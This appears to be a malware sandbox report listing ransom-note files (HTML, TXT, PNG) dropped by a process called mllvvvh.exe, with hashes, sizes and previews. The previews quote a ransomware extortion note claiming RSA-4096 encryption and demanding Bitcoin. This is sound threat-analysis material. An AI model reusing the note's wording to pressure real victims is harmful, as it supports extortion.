                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
